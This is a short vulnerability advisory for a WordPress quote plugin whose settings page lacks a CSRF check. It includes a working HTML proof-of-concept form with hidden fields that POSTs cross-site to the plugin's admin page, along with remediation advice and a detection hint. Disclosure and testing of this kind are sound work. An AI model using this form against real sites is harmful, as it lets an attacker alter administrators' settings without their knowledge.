The plugin does not perform any CSRF check when updating its settings, so an attacker can cause a logged-in administrator's browser to submit a request that changes them to arbitrary values.
<!--
  Proof of concept for the missing CSRF check described above.
  The page holds one form that POSTs the plugin's settings fields to the
  WordPress admin settings page; example.com stands in for the site under test.
  Every field is hidden and the only visible control is the submit button.

  What to notice as a reviewer: none of the fields below is an anti-CSRF
  token (WordPress's usual nonce field is _wpnonce). The request carries only
  setting values and the submit marker, so the server cannot tell it apart
  from one sent by the real settings screen.

  Remediation belongs in the plugin's save handler, which this page does not show:
  emit a nonce in the settings form with wp_nonce_field(), verify it on save
  with check_admin_referer() or wp_verify_nonce(), and confirm the caller's
  capability with current_user_can() before writing any option.
  Browser SameSite cookie defaults are not a substitute for that server-side check.
-->
<html>
<body>
<!-- Target is the plugin's page under options-general.php; the form is sent as a plain cross-site POST. -->
<form action="https://example.com/wp-admin/options-general.php?page=shantz-wp-qotd.php" method="POST">
<!-- Setting values chosen by whoever hosts this page; presumably they map one-to-one to the plugin's stored options (confirm against the plugin source). -->
<input type="hidden" name="shantzWpQotdEnable" value="true" />
<input type="hidden" name="shantzWpQotdSrcBox" value="true" />
<input type="hidden" name="shantzWpQotdSrcFile" value="false" />
<input type="hidden" name="shantzWpQotdSeparator" value="" />
<!-- Harmless marker text: if it appears in the plugin's settings after the request, the change was accepted without a token. -->
<input type="hidden" name="shantzWpQotdDb" value="Quote via CSRF" />
<input type="hidden" name="shantzWpQotdPattern" value="qottd" />
<input type="hidden" name="shantzWpQotdAddAuto" value="true" />
<input type="hidden" name="shantzWpQotdExcludePages" value="false" />
<input type="hidden" name="shantzWpQotdAddBottom" value="true" />
<input type="hidden" name="shantzWpQotdStaticTextBefore" value="" />
<input type="hidden" name="shantzWpQotdStaticTextAfter" value="" />
<!-- NOTE(review): looks like the field the handler tests to decide a save was requested; it is a fixed, guessable value and gives no CSRF protection. -->
<input type="hidden" name="update_shantzWpQotdPluginSettings" value="Update Settings" />
<input type="submit" value="Submit request" />
</form>
<!-- Detection hint: a POST to this settings page whose Origin or Referer is not the site's own admin area, followed by changed plugin options, is worth alerting on. -->
</body>